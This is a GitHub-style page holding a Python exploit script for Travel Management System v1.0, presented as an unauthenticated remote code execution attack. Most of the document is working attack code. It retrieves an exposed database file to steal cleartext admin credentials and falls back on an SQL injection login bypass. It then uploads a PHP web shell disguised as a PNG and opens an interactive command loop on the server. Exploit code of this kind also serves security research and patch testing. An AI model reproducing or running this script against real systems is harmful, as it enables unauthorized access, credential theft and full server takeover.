-
Notifications
You must be signed in to change notification settings - Fork 4
/
TravelManagementRCE.py
196 lines (166 loc) · 7.88 KB
/
TravelManagementRCE.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
# Exploit Title: Travel Management System v1.0 - Unauthenticated Remote Code Execution
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# Vulnerability Discovery: Adeeb Shah (@hyd3sec)
# Date: August 10, 2020
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/travel.zip
# Version: 1.0
# CWE-732: Incorrect Permission Assignment for Critical Resource
# CWE-434: Unrestricted Upload of File with Dangerous Type
# Overall CVSS Score: 9.1
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:W/RC:R/CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:X/MC:X/MI:H/MA:H
# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
# CVSS Temporal Score: 9.1 | CVSS Environmental Score: 9.1 | Modified Impact Subscore: 6.1
# Tested On: Windows 10 (x64_86) + XAMPP | Python 2.7
# Vulnerability Description:
# Travel Management System v1.0 suffers from insufficient permissions allowing unauthenticated access to the database file containing credentials stored in clear text. This exploit automates all steps required to retrieve credentials and login with SQLi login bypass as a fail-safe and gain Remote Code Execution through an arbitrary file upload vulnerability.
import requests, re, sys, os
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '
def formatHelp(STRING):
return S[1]+F[2]+STRING+S[0]
def header():
head = S[3]+F[5]+' --- Travel Management System v1.0 - Unauthenticated Remote Code Execution (RCE) ---\n'+S[0]
return head
if __name__ == "__main__":
#1 | INIT
print(header())
#print(sig())
if len(sys.argv) != 3:
print(err+formatHelp("Usage:\t python %s <WEBAPP_URL> <Writable Path>" % sys.argv[0]))
print(err+formatHelp("Example:\t python %s http://192.168.222.135 $PWD" % sys.argv[0]))
sys.exit(-1)
global user
global password
#2 | FUNCTIONS
def webshell(SERVER_URL, WEBSHELL_PATH, session):
try:
WEB_SHELL = SERVER_URL + WEBSHELL_PATH
print(info+"Webshell URL: "+ WEB_SHELL)
getdir = {'s33k': 'echo %CD%'}
req = session.post(url=WEB_SHELL, data=getdir, verify=False)
status = req.status_code
if status != 200:
print(err+"Could not connect to the target system.")
req.raise_for_status()
print(ok+'Successfully connected to target system. All artifacts have been removed.')
cwd = re.findall('[CDEF].*', req.text)
cwd = cwd[0]+"> "
term = S[3]+F[5]+cwd+F[0]
print(F[0]+'____________________'+' Remote Code Execution '+F[0]+'____________________')
while True:
cmd = raw_input(term)
command = {'s33k': cmd}
req = requests.post(WEB_SHELL, data=command, verify=False)
status = req.status_code
if status != 200:
req.raise_for_status()
resp= req.text
print(resp)
except:
print('\r\n'+err+'Webshell session failed. Quitting.')
sys.exit(-1)
url = sys.argv[1] + '/travel/database/travel.sql'
r = requests.get(url)
server_url = sys.argv[1]
login_url = sys.argv[1] + '/travel/admin/loginform.php'
upload_url = sys.argv[1] + '/travel/admin/updatesubcategory.php'
#3 | EXPLOIT
print(info+'Attempting to exploit insecure permissions and download db file...')
with open(sys.argv[2] + '/travel.sql', 'wb') as f:
f.write(r.content)
if(r.status_code) != 200:
print(err+'Failed to save file locally...')
else:
print(ok+'File saved!')
with open(sys.argv[2] + "/travel.sql") as f:
found = False
for line in f:
if re.search('\'Admin\'', line):
print (ok+'Admin creds found while parsing db file!!!')
creds = str(line)
chars = "();'"
pattern = "[" + chars + "]"
credsnew = re.sub(pattern, "", creds)
#print credsnew
x = credsnew.split()
user = str(x[0])
user = user.replace(",", "")
password = str(x[1])
password = password.replace(",", "")
print(ok+'Admin Username: ' + user + ' Password: ' + password)
found = True
print(info+'Locating and cleaning up artifact...')
if os.path.exists(sys.argv[2] + "/travel.sql"):
os.remove("travel.sql")
else:
print(err+'Artifact not found! Make sure you manually find and remove it...')
print(info+'Attempting to connect...')
#4 | LOGIN
# Create a web session in python
s = requests.Session()
# GET request to webserver - Start a session & retrieve a session cookie
get_session = s.get(sys.argv[1], verify=False)
# Check connection to website & print session cookie to terminal OR die
if get_session.status_code == 200:
print(ok+'Successfully connected to target server & created session.')
else:
print(err+'Cannot connect to the server and create a web session.')
sys.exit(-1)
print(ok+'Username: ' + user)
print(ok+'Password: ' + password)
login_data = {'t1':user, 't2':password,'sbmt':'LOGIN'}
print(info+"Attempting to login with ripped credentials...")
#auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies)
auth = s.post(url=login_url, data=login_data, verify=False)
loginchk = str(re.findall(r'Admin Links', auth.text))
# print(loginchk) # Debug - search login response for successful login
if loginchk == "[u'Admin Links']":
print(ok+"Login successful.")
else:
print(err+"Failed login. The database file may not reflect the current phpmyadmin configuration. Trying login bypass...")
#5 | SQLi Fail-Safe Login Bypass
sqli_data = {'t1':"' or '1'='1'#", 't2':'hyd3sec','sbmt':'LOGIN'}
print(info+"Attempting to execute SQLi bypass to login without credentials...")
#auth = s.post(url=login_url, data=sqli_data, verify=False, proxies=proxies)
auth = s.post(url=login_url, data=sqli_data, verify=False)
loginchk = str(re.findall(r'Admin Links', auth.text))
# print(loginchk) # Debug - search login response for successful login
if loginchk == "[u'Admin Links']":
print(ok+"SQLi Login bypass successful.")
else:
print(err+"SQLi failed.")
sys.exit(-1)
#6 | File Upload
# Content-Disposition: form-data; name="image"; filename="hyd3sec.php"
# Content-Type: image/png
shellz = {
't3':
(
'hyd3sec.php',
'<?php echo shell_exec($_REQUEST["s33k"]); ?>',
'image/png',
{'Content-Disposition': 'form-data'}
)
}
fdata = {'s1':'1','t1':'','t2':'Select','h1':'','t4':'','sbmt':'Update'}
print(info+"Exploiting image file upload vulnerability to upload and obfuscate shell")
#upload_house = s.post(url=UPLOAD_URL, files=shellz, data=fdata, verify=False, proxies=proxies)
upload_house = s.post(url=upload_url, files=shellz, data=fdata, verify=False)
#7 | Get Upload Name
get_session2 = s.get(server_url + '/travel/admin/subcatimages/hyd3sec.php', verify=False)
if get_session2.status_code == 200:
print(ok+'Successfully uploaded malicious file...')
else:
print(err+'Could not locate correct path!')
sys.exit(-1)
webshPath = '/travel/admin/subcatimages/hyd3sec.php'
#8 | RCE
webshell(server_url, webshPath, s)